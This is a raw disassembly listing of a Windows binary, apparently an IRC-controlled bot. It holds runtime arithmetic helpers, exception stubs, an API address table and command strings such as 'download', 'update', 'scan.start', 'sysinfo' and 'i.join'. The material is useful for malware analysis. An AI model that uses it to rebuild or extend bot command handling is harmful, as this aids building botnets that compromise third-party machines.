arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_41C7A1
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_41C7A1: ; CODE XREF: sub_41C780+Bj
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41C7BD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41C7BD: ; CODE XREF: sub_41C780+27j
or eax, eax
jnz short loc_41C7D9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41C81A
; ---------------------------------------------------------------------------
loc_41C7D9: ; CODE XREF: sub_41C780+3Fj
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41C7E7: ; CODE XREF: sub_41C780+71j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41C7E7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41C815
cmp edx, [esp+0Ch+arg_4]
ja short loc_41C815
jb short loc_41C816
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41C816
loc_41C815: ; CODE XREF: sub_41C780+85j
; sub_41C780+8Bj
dec esi
loc_41C816: ; CODE XREF: sub_41C780+8Dj
; sub_41C780+93j
xor edx, edx
mov eax, esi
loc_41C81A: ; CODE XREF: sub_41C780+57j
dec edi
jnz short loc_41C824
neg edx
neg eax
sbb edx, 0
loc_41C824: ; CODE XREF: sub_41C780+9Bj
pop ebx
pop esi
pop edi
retn 10h
sub_41C780 endp
; ---------------------------------------------------------------------------
align 10h
cmp dword_435800, 0
jz short sub_41C866
loc_41C839: ; CODE XREF: .text:0041C864j
push ebp
mov ebp, esp
sub esp, 8
and esp, 0FFFFFFF8h
fstp qword ptr [esp]
cvttsd2si eax, qword ptr [esp]
leave
retn
; ---------------------------------------------------------------------------
cmp dword_435800, 0
jz short sub_41C866
sub esp, 4
fnstcw word ptr [esp]
pop eax
and ax, 7Fh
cmp ax, 7Fh
jz short loc_41C839
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C866 proc near ; CODE XREF: sub_41AFF3+599p
; .text:0041C837j ...
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_41C8C5
loc_41C889: ; CODE XREF: sub_41C866+69j
fsubp st(1), st
test edx, edx
jns short loc_41C8AD
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_41C8D9
; ---------------------------------------------------------------------------
loc_41C8AD: ; CODE XREF: sub_41C866+27j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_41C8D9
; ---------------------------------------------------------------------------
loc_41C8C5: ; CODE XREF: sub_41C866+21j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_41C889
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_41C8D9: ; CODE XREF: sub_41C866+45j
; sub_41C866+5Dj
leave
retn
sub_41C866 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41C8E3: ; DATA XREF: sub_402A46+2o
; sub_402A85+2o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_4215F8
jmp sub_40463E
; ---------------------------------------------------------------------------
loc_41C8FE: ; DATA XREF: sub_40B863+2o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421998
jmp sub_40463E
; =============== S U B R O U T I N E =======================================
sub_41C919 proc near ; CODE XREF: sub_408412+14p
; DATA XREF: sub_401442+2o
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
lea eax, [edx+0Ch]
mov ecx, [edx-1Ch]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421E50
jmp sub_40463E
sub_41C919 endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_403096
; ---------------------------------------------------------------------------
loc_41C93C: ; DATA XREF: sub_401065+2o
; sub_4013E6+2o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421E80
jmp sub_40463E
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41C95F: ; DATA XREF: sub_4016BA+2o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-58h]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421EB0
jmp sub_40463E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_403339
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C984: ; DATA XREF: sub_41BD7B+2o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421D40
jmp sub_40463E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_403339
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C9A9: ; DATA XREF: sub_419545+2o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421D6C
jmp sub_40463E
; ---------------------------------------------------------------------------
push dword ptr [ebp-154h]
call sub_403339
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C9D1: ; DATA XREF: sub_4145BE+8o
mov edx, [esp+8]
lea eax, [edx-154h]
mov ecx, [edx-158h]
xor ecx, eax
call sub_402ADC
add eax, 8
mov ecx, [edx-8]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421D98
jmp sub_40463E
; ---------------------------------------------------------------------------
push dword ptr [ebp-33Ch]
call sub_403339
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41CA0C: ; DATA XREF: sub_41C18A+5o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-344h]
xor ecx, eax
call sub_402ADC
mov ecx, [edx-4]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421DC4
jmp sub_40463E
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41CA3C: ; DATA XREF: sub_40121E+2o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421EE0
jmp sub_40463E
; ---------------------------------------------------------------------------
push dword ptr [ebp-58h]
call sub_403339
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41CA61: ; DATA XREF: sub_4022DF+2o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-70h]
xor ecx, eax
call sub_402ADC
mov ecx, [edx-4]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421F10
jmp sub_40463E
; ---------------------------------------------------------------------------
push dword ptr [ebp-13Ch]
call sub_403339
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41CA93: ; DATA XREF: sub_401E4D+8o
mov edx, [esp+8]
lea eax, [edx-13Ch]
mov ecx, [edx-140h]
xor ecx, eax
call sub_402ADC
add eax, 0Ch
mov ecx, [edx-8]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421F40
jmp sub_40463E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4BCh]
call sub_403339
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41CACE: ; DATA XREF: sub_4019F3+5o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402ADC
mov ecx, [edx-4]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421F70
jmp sub_40463E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4C0h]
call sub_403339
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41CB03: ; DATA XREF: sub_40177B+5o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402ADC
mov ecx, [edx-4]
xor ecx, eax
call sub_402ADC
mov eax, offset dword_421FA0
jmp sub_40463E
; ---------------------------------------------------------------------------
call sub_401291
and dword_4357B4, 0
push offset loc_41CCDF
mov dword_4357B0, eax
call sub_4031ED
pop ecx
retn
; ---------------------------------------------------------------------------
call sub_40172D
and dword_4357C0, 0
push offset loc_41CD28
mov dword_4357BC, eax
call sub_4031ED
pop ecx
retn
; ---------------------------------------------------------------------------
push esi
push offset aDownload ; "download"
mov esi, offset off_4357C8
call sub_41C283
mov off_4357C8, offset off_420BC4
pop esi
retn
; ---------------------------------------------------------------------------
push esi
push offset aUpdate ; "update"
mov esi, offset off_4357C4
call sub_41C283
mov off_4357C4, offset off_420BCC
pop esi
retn
; ---------------------------------------------------------------------------
push esi
push offset aI_quit ; "i.quit"
mov esi, offset off_4357D4
call sub_41C283
mov off_4357D4, offset off_420C40
pop esi
retn
; ---------------------------------------------------------------------------
push esi
push offset aI_join ; "i.join"
mov esi, offset off_4357CC
call sub_41C283
mov off_4357CC, offset off_420C48
pop esi
retn
; ---------------------------------------------------------------------------
push esi
push offset aI_part ; "i.part"
mov esi, offset off_4357D0
call sub_41C283
mov off_4357D0, offset off_420C50
pop esi
retn
; ---------------------------------------------------------------------------
push esi
push offset aHttp ; "http"
mov esi, offset off_4357D8
call sub_41C283
mov off_4357D8, offset off_420C68
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CC0D: ; DATA XREF: fabskl8p:0041D2ACo
push esi
push offset aS4 ; "s4"
mov esi, offset off_4357E0
call sub_41C283
mov off_4357E0, offset off_420CB4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CC29: ; DATA XREF: fabskl8p:0041D2B0o
push esi
push offset aS4_stop ; "s4.stop"
mov esi, offset off_4357DC
call sub_41C283
mov off_4357DC, offset off_420CBC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CC45: ; DATA XREF: fabskl8p:0041D2B4o
push esi
push offset aSysinfo ; "sysinfo"
mov esi, offset off_4357E4
call sub_41C283
mov off_4357E4, offset off_420D7C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CC61: ; DATA XREF: fabskl8p:0041D2B8o
push esi
push offset aNetinfo ; "netinfo"
mov esi, offset off_4357E8
call sub_41C283
mov off_4357E8, offset off_420D84
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CC7D: ; DATA XREF: fabskl8p:0041D2BCo
mov eax, dword_425824
add eax, 6
mov dword_4357EC, eax
retn
; ---------------------------------------------------------------------------
loc_41CC8B: ; DATA XREF: fabskl8p:0041D2C0o
push esi
push offset aScan_start ; "scan.start"
mov esi, offset off_4357F8
call sub_41C283
mov off_4357F8, offset off_420ED4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CCA7: ; DATA XREF: fabskl8p:0041D2C4o
push esi
push offset aScan_stop ; "scan.stop"
mov esi, offset off_4357F0
call sub_41C283
mov off_4357F0, offset off_420EDC
pop esi
retn
; ---------------------------------------------------------------------------
push esi
push offset dword_41EF00
mov esi, offset off_4357F4
call sub_41C283
mov off_4357F4, offset off_420EE4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CCDF: ; DATA XREF: .text:0041CB37o
mov eax, dword_4357B0
mov ecx, [eax]
mov [eax], eax
mov eax, dword_4357B0
mov [eax+4], eax
and dword_4357B4, 0
cmp ecx, dword_4357B0
jz short loc_41CD14
push esi
loc_41CD00: ; CODE XREF: .text:0041CD11j
mov esi, [ecx]
push ecx
call sub_403339
cmp esi, dword_4357B0
pop ecx
mov ecx, esi
jnz short loc_41CD00
pop esi
loc_41CD14: ; CODE XREF: .text:0041CCFDj
push dword_4357B0
call sub_403339
and dword_4357B0, 0
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41CD28: ; DATA XREF: .text:0041CB54o
mov eax, dword_4357BC
mov ecx, [eax]
mov [eax], eax
mov eax, dword_4357BC
mov [eax+4], eax
and dword_4357C0, 0
cmp ecx, dword_4357BC
jz short loc_41CD5D
push esi
loc_41CD49: ; CODE XREF: .text:0041CD5Aj
mov esi, [ecx]
push ecx
call sub_403339
cmp esi, dword_4357BC
pop ecx
mov ecx, esi
jnz short loc_41CD49
pop esi
loc_41CD5D: ; CODE XREF: .text:0041CD46j
push dword_4357BC
call sub_403339
and dword_4357BC, 0
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41CD71: ; DATA XREF: sub_403417+40o
mov dword_4275E4, offset off_41D324
mov ecx, offset dword_4275E4
jmp sub_403096
; ---------------------------------------------------------------------------
align 400h
_text ends
; Section 2. (virtual address 0001D000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 0001D000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
fabskl8p segment para public 'CODE' use32
assume cs:fabskl8p
;org 41D000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
off_41D000 dd offset sub_452C66 ; DATA XREF: sub_417722+39r
; ut7h7i2x:00442B21r ...
off_41D004 dd offset sub_4549F0 ; DATA XREF: sub_41764F+1Dr
; sub_417722+1Br
off_41D008 dd offset sub_45A8EC ; DATA XREF: sub_4176BD+31r
off_41D00C dd offset sub_45633E ; DATA XREF: sub_41764F+52r
off_41D010 dd offset sub_44681E ; DATA XREF: sub_41764F+2Ar
; sub_41764F+60r ...
off_41D014 dd offset sub_449957 ; DATA XREF: sub_41A06E+3Cr
; ut7h7i2x:0043A1A6w ...
off_41D018 dd offset sub_449ED1 ; DATA XREF: sub_41A4A6+A5r
; sub_41A4A6+1B6r ...
off_41D01C dd offset sub_44FF66 ; DATA XREF: sub_419F99+82r
; ut7h7i2x:0043C23Br ...
off_41D020 dd offset sub_440DB3 ; DATA XREF: sub_41A2D8+132r
; ut7h7i2x:0044C11Fr ...
off_41D024 dd offset sub_459111 ; DATA XREF: sub_41A456+Cr
; sub_443CC8+9r
off_41D028 dd offset sub_4463D6 ; DATA XREF: sub_419F99+24r
; ut7h7i2x:0043EC47r ...
off_41D02C dd offset sub_44DF79 ; DATA XREF: sub_4176BD+14r
; sub_41A2D8+90r ...
off_41D030 dd offset sub_459861 ; DATA XREF: sub_41A6D9+299r
; ut7h7i2x:00443987w ...
off_41D034 dd offset sub_44399B ; DATA XREF: sub_41A06E+19r
; ut7h7i2x:004397AFw ...
off_41D038 dd offset sub_44697F ; DATA XREF: sub_41A6D9+27Dr
; ut7h7i2x:00443EF4r ...
off_41D03C dd offset sub_4497AC ; DATA XREF: sub_41A456+2Er
; sub_4497AC+5r ...
off_41D040 dd offset sub_45107E ; DATA XREF: sub_41A456+3Br
; sub_45107E+5r
off_41D044 dd offset sub_449808 ; DATA XREF: sub_41A456+1Er
; ut7h7i2x:00447EC0r ...
off_41D048 dd offset sub_458E5E ; DATA XREF: sub_40207D+113r
; ut7h7i2x:00454CB3w ...
align 10h
off_41D050 dd offset sub_456ADD ; DATA XREF: sub_407C57+Er
; sub_419CB0+168r ...
off_41D054 dd offset sub_43C923 ; DATA XREF: sub_410661+22r
; sub_41964D+29r ...
dword_41D058 dd 77E802FCh ; DATA XREF: sub_40B439+5Dr
; sub_4195CE+Br ...
dword_41D05C dd 77E61BB8h ; DATA XREF: sub_419A4F+8Br
; ut7h7i2x:00448673w ...
dword_41D060 dd 77E7A099h ; DATA XREF: sub_409E64+99r
; sub_40B203+2Ar ...
off_41D064 dd offset sub_44D432 ; DATA XREF: sub_4195CE+19r
; sub_44D432+5r ...
dword_41D068 dd 77E7C657h ; DATA XREF: sub_4044D2-192r
; sub_41967F+24r ...
off_41D06C dd offset sub_44D15F ; DATA XREF: sub_40E422+234r
; sub_4117DB+13r ...
off_41D070 dd offset sub_4499F4 ; DATA XREF: sub_418D80+31Er
; sub_4499F4+5r ...
off_41D074 dd offset sub_44427E ; DATA XREF: sub_40D06E+40r
; sub_410B0B+2Dr ...
off_41D078 dd offset sub_447D87 ; DATA XREF: sub_40A15D+17Fr
; sub_40A15D+2A3r ...
off_41D07C dd offset sub_43CCEE ; DATA XREF: sub_414887+5Er
; sub_41AFF3+6BBr ...
dword_41D080 dd 77E6BD13h ; DATA XREF: sub_41C2E2+196r
; ut7h7i2x:00443185w ...
off_41D084 dd offset sub_447167 ; DATA XREF: sub_41C2E2+2F0r
; sub_43A990w ...
off_41D088 dd offset sub_4558B7 ; DATA XREF: sub_409E64+194r
; sub_40D20A+212r ...
off_41D08C dd offset sub_4551C1 ; DATA XREF: sub_403209+AAr
; sub_404A3E+B9r ...
off_41D090 dd offset sub_459395 ; DATA XREF: sub_414887+1Cr
; sub_41BBD8+161r ...
off_41D094 dd offset sub_454B6C ; DATA XREF: sub_4147FF+8r
; sub_44E5AB-EC48w ...
off_41D098 dd offset sub_45066E ; DATA XREF: sub_40207D+B3r
; ut7h7i2x:0043C310r ...
off_41D09C dd offset sub_43E766 ; DATA XREF: sub_41AFF3+62Dr
; sub_44D807+23w ...
dword_41D0A0 dd 77E77CCEh ; DATA XREF: sub_40A15D+3E7r
; sub_40C307:loc_40C3B4r ...
off_41D0A4 dd offset sub_441765 ; DATA XREF: sub_410957+14Cr
; ut7h7i2x:004390F2w ...
off_41D0A8 dd offset sub_44B005 ; DATA XREF: sub_41088C+45r
; ut7h7i2x:00439399w ...
off_41D0AC dd offset sub_444BA4 ; DATA XREF: sub_41088C+78r
; ut7h7i2x:0043B86Dr ...
off_41D0B0 dd offset sub_44C7DF ; DATA XREF: sub_41088C+9Br
; ut7h7i2x:0043BCEFr ...
off_41D0B4 dd offset sub_448FAC ; DATA XREF: sub_40F3FF+8Cr
; ut7h7i2x:0043B478r ...
off_41D0B8 dd offset sub_44185C ; DATA XREF: sub_40F02F:loc_40F083r
; sub_40F0AC:loc_40F104r ...
dword_41D0BC dd 77E79824h ; DATA XREF: sub_419E25+39r
; ut7h7i2x:00443FF5r ...
dword_41D0C0 dd 77E7C4B7h ; DATA XREF: sub_419E25+50r
; ut7h7i2x:0043FB75r ...
dword_41D0C4 dd 77E79E4Bh ; DATA XREF: sub_419E25+6Fr
; ut7h7i2x:00441723r ...
dword_41D0C8 dd 77E79C90h ; DATA XREF: sub_403209+D9r
; sub_404A3E+F5r ...
off_41D0CC dd offset sub_446ACE ; DATA XREF: sub_41A68E+20r
; sub_41C2E2+272r ...
off_41D0D0 dd offset sub_450077 ; DATA XREF: sub_41A181+3Br
; sub_450077+5r
off_41D0D4 dd offset sub_456590 ; DATA XREF: sub_41A1E5+3Br
; sub_43DDEF+9r ...
off_41D0D8 dd offset sub_4588BA ; DATA XREF: sub_408DFD+4Br
; sub_40E422+29Cr ...
dword_41D0DC dd 77E77CC4h ; DATA XREF: sub_4056CA+60r
; sub_405886+169r ...
dword_41D0E0 dd 77E79F93h ; DATA XREF: sub_4054D7+39r
; sub_405543+39r ...
off_41D0E4 dd offset sub_459B58 ; DATA XREF: sub_40F8D4+2Dr
; sub_419EB0+30r ...
off_41D0E8 dd offset sub_446320 ; DATA XREF: sub_4054D7+49r
; sub_405543+49r ...
dword_41D0EC dd 77F5157Dh ; DATA XREF: sub_4039CF+79r
; sub_4056CA+2r ...
dword_41D0F0 dd 77E704FCh ; DATA XREF: sub_40207D+122r
; sub_417776+D1r ...
off_41D0F4 dd offset sub_43A5C0 ; DATA XREF: sub_403209+E0r
; sub_404A3E+FCr ...
off_41D0F8 dd offset sub_44CB78 ; DATA XREF: sub_407AEA+1Dr
; sub_407B2A+25r ...
dword_41D0FC dd 77E77CB7h ; DATA XREF: sub_4044D2-1B7r
; sub_410957+67r ...
off_41D100 dd offset sub_442AD1 ; DATA XREF: sub_41A6D9:loc_41A941r
; ut7h7i2x:00457B12w ...
dword_41D104 dd 77E7751Ah ; DATA XREF: sub_40B439+51r
; sub_417C7B+36r ...
dword_41D108 dd 77F51597h ; DATA XREF: sub_4039CF+68r
; sub_4044D2-182r ...
off_41D10C dd offset sub_44830C ; DATA XREF: sub_41B9D6+20r
; sub_41BBD8+43r ...
dword_41D110 dd 77F516F8h ; DATA XREF: sub_403AAC+Fr
; sub_4044D2-1AEr ...
off_41D114 dd offset sub_445267 ; DATA XREF: sub_40D20A+11Dr
; sub_445267+5r ...
off_41D118 dd offset sub_4459B2 ; DATA XREF: sub_40D20A:loc_40D343r
; sub_440E5F+A949w ...
off_41D11C dd offset sub_4476D0 ; DATA XREF: .text:0040CEB8r
; sub_449E96+1C4Dw ...
dword_41D120 dd 77E7C866h ; DATA XREF: sub_40C6EC+2Dr
; sub_40C6EC+11Cr ...
off_41D124 dd offset sub_45A589 ; DATA XREF: sub_40C6EC+191r
; sub_45A589+5r
dword_41D128 dd 77E781F9h ; DATA XREF: sub_40C307+30r
; sub_40C307+144r ...
off_41D12C dd offset sub_446F56 ; DATA XREF: sub_40C307+294r
; sub_40C307+365r ...
dword_41D130 dd 77E77EE1h ; DATA XREF: sub_40B2BC+Br
; ut7h7i2x:00450FF8r
dword_41D134 dd 77E79924h ; DATA XREF: sub_40B2BC:loc_40B336r
; sub_40C307+216r ...
dword_41D138 dd 77E7C9E1h ; DATA XREF: sub_40B2BC+CCr
; sub_43D021+5DD1w ...
off_41D13C dd offset sub_442E06 ; DATA XREF: sub_40B2BC:loc_40B39Ar
; sub_43DCB8-22Dw ...
off_41D140 dd offset sub_441DAB ; DATA XREF: sub_40B2BC+10Fr
; sub_40B2BC+126r ...
dword_41D144 dd 77E78406h ; DATA XREF: sub_408B90+12Br
; sub_408B90+1C7r ...
dword_41D148 dd 77E79C3Dh ; DATA XREF: sub_408B90+1B5r
; sub_409E64+169r ...
dword_41D14C dd 77E7C931h ; DATA XREF: sub_408B90+21Fr
; sub_43D509+9r ...
off_41D150 dd offset sub_446200 ; DATA XREF: sub_406214+27r
; sub_40DE1D+134r ...
off_41D154 dd offset sub_44D683 ; DATA XREF: sub_406214+77r
; sub_4062C4+52r ...
off_41D158 dd offset sub_43ED59 ; DATA XREF: sub_405F00+22Fr
; sub_44F495:loc_43FC27w ...
dword_41D15C dd 77E7C726h ; DATA XREF: sub_405E33+11r
; ut7h7i2x:0043FC40r ...
off_41D160 dd offset sub_455145 ; DATA XREF: sub_405E33+47r
; ut7h7i2x:004399E4r ...
dword_41D164 dd 77F7E21Fh ; DATA XREF: sub_405DA7+28r
; sub_40850B+28r ...
dword_41D168 dd 77F7E300h ; DATA XREF: sub_405CCF+Dr
; sub_40855D+28r ...
off_41D16C dd offset sub_450022 ; DATA XREF: sub_405C7A+1r
; sub_40E383+62r ...
dword_41D170 dd 77F51587h ; DATA XREF: sub_4056CA+78r
; sub_40CEC4+ABr ...
off_41D174 dd offset sub_454A20 ; DATA XREF: sub_4055D9+2Br
; sub_405886+85r ...
dword_41D178 dd 77E79B39h ; DATA XREF: sub_4055AF+23r
; sub_405886+58r ...
dword_41D17C dd 77E7C5B4h ; DATA XREF: sub_4055A6r
; sub_405886:loc_405925r ...
dword_41D180 dd 77E78B61h ; DATA XREF: sub_4054D7+7r
; sub_405543+7r ...
off_41D184 dd offset sub_43A556 ; DATA XREF: sub_404DF4+27r
; sub_44A998+9r
dword_41D188 dd 77E7A13Fh ; DATA XREF: sub_404DF4+4Ar
; sub_4474D5+5r ...
dword_41D18C dd 77E778C5h ; DATA XREF: sub_404D50+59r
; sub_405019+76r ...
dword_41D190 dd 77F522F2h ; DATA XREF: sub_402E11+82r
; ut7h7i2x:0045240Cr ...
dword_41D194 dd 77E80656h ; DATA XREF: sub_402EB4r
; sub_40B439+41r ...
off_41D198 dd offset sub_459584 ; DATA XREF: sub_403209+BEr
; sub_404A3E+D9r ...
dword_41D19C dd 77E7C9E7h ; DATA XREF: sub_403209+B4r
; sub_404A3E+CEr ...
off_41D1A0 dd offset sub_444AA3 ; DATA XREF: sub_40390C+9r
; sub_40B439+35r
off_41D1A4 dd offset sub_44EE57 ; DATA XREF: sub_4044D2:loc_4043FFr
off_41D1A8 dd offset sub_4462B0 ; DATA XREF: sub_4044D2-1CCr
; sub_408B90+15r
off_41D1AC dd offset sub_44B96D ; DATA XREF: sub_40456B+40r
; sub_40FBF7+222r ...
off_41D1B0 dd offset sub_44491C ; DATA XREF: sub_413D26r
; sub_459A71:loc_44BB87w ...
dword_41D1B4 dd 77E7849Fh ; DATA XREF: sub_404BC6+24r
; sub_404E6E+56r ...
dword_41D1B8 dd 77E777EFh ; DATA XREF: sub_404D50+84r
; sub_405019+95r ...
align 10h
dword_41D1C0 dd 71B2ACCBh ; DATA XREF: sub_402A0Er
align 8
dword_41D1C8 dd 1F7CD927h ; DATA XREF: sub_402A02r
dword_41D1CC dd 1F7CB8F8h ; DATA XREF: sub_4029FCr
dword_41D1D0 dd 1F7CD214h ; DATA XREF: sub_4029F6r
dword_41D1D4 dd 1F7D886Ah ; DATA XREF: sub_4029F0r
dword_41D1D8 dd 1F7BA3A9h ; DATA XREF: sub_4029EAr
align 10h
dword_41D1E0 dd 77428B97h ; DATA XREF: sub_4198F3+148r
; sub_41BF2B+1E3r
align 8
off_41D1E8 dd offset sub_44FF0A ; DATA XREF: sub_417C7B+30r
; ut7h7i2x:0044A638r ...
off_41D1EC dd offset sub_449E26 ; DATA XREF: sub_41946E+67r
; sub_44986A+13w ...
off_41D1F0 dd offset sub_4482C0 ; DATA XREF: sub_41946E+Cr
; sub_4482C0+5r ...
off_41D1F4 dd offset sub_446258 ; DATA XREF: sub_41946E+B1r
; sub_4448D7+9w ...
off_41D1F8 dd offset sub_44CE09 ; DATA XREF: sub_41946E+94r
; ut7h7i2x:0043EFF5r ...
off_41D1FC dd offset loc_450F1F ; DATA XREF: sub_419319+Dr
; ut7h7i2x:loc_4449D5w ...
off_41D200 dd offset sub_4449E9 ; DATA XREF: sub_41946E+BBr
; sub_4449E9+5r ...
off_41D204 dd offset sub_45A027 ; DATA XREF: sub_41946E+A5r
; sub_455AD6:loc_43D5A3w ...
off_41D208 dd offset sub_44F21A ; DATA XREF: sub_41946E+4Ar
; sub_43AA94+10B75w ...
align 10h
dword_41D210 dd 7620BD61h ; DATA XREF: sub_41BF2B+EBr
dword_41D214 dd 76214750h ; DATA XREF: sub_41BF2B+7Dr
dword_41D218 dd 7620AFB6h ; DATA XREF: sub_41BF2B+39r
align 10h
dword_41D220 dd 71AB3C22h ; DATA XREF: sub_413D2C+20r
; sub_414446+C9r ...
dword_41D224 dd 71ABD755h ; DATA XREF: sub_402242+4Br
; sub_418D80+4F9r
dword_41D228 dd 71AB1AF4h ; DATA XREF: sub_414337+B0r
; sub_414337+F1r ...
dword_41D22C dd 71AB60C9h ; DATA XREF: sub_41934D+FAr
dword_41D230 dd 71AB5DE2h ; DATA XREF: sub_4145BE+B7r
; sub_41934D+10Cr
dword_41D234 dd 71AB868Dh ; DATA XREF: sub_4145BE+168r
; sub_418B8B+1Ar
dword_41D238 dd 71AB157Eh ; DATA XREF: sub_4197F4+3Br
dword_41D23C dd 71AB3E5Dh ; DATA XREF: sub_413D2C+78r
; sub_414446+DCr ...
dword_41D240 dd 71AB1836h ; DATA XREF: sub_41C2E2:loc_41C75Er
dword_41D244 dd 71AB2BBFh ; DATA XREF: sub_418884+7Br
dword_41D248 dd 71AB1ED3h ; DATA XREF: sub_41B9D6+F7r
dword_41D24C dd 71AB3F8Dh ; DATA XREF: sub_41BBD8+58r
dword_41D250 dd 71AB1746h ; DATA XREF: sub_41B9D6+131r
; sub_41B9D6+147r ...
dword_41D254 dd 71AB1890h ; DATA XREF: sub_413D2C+8Fr
; sub_414337+78r ...
dword_41D258 dd 71AB1444h ; DATA XREF: sub_41B9D6+11Cr
; sub_41BBD8+12Cr
dword_41D25C dd 71AB401Ch ; DATA XREF: sub_41AFF3+3Cr
; sub_41AFF3+75Dr ...
dword_41D260 dd 71AB1B7Bh ; DATA XREF: sub_402A08r
dword_41D264 dd 71AB12F8h ; DATA XREF: sub_402242+3Ar
dword_41D268 dd 71AB155Ah ; DATA XREF: sub_413D2C+54r
dword_41D26C dd 71AB5690h ; DATA XREF: sub_414337+14r
; sub_414446+64r ...
dword_41D270 dd 71AB1746h ; DATA XREF: sub_413D2C+34r
; sub_4145BE+81r ...
dword_41D274 dd 71AB41DAh ; DATA XREF: sub_41C2E2+3B4r
dword_41D278 dd 71ABF628h ; DATA XREF: sub_418D80+4C9r
dword_41D27C dd 71AB3ECEh ; DATA XREF: sub_4145BE+9Er
; sub_41934D+D7r ...
dword_41D280 dd 71AB1A6Dh ; DATA XREF: sub_401FDA+11r
; sub_413D2C+98r ...
align 8
dword_41D288 dd 0 ; DATA XREF: sub_407D29+49o
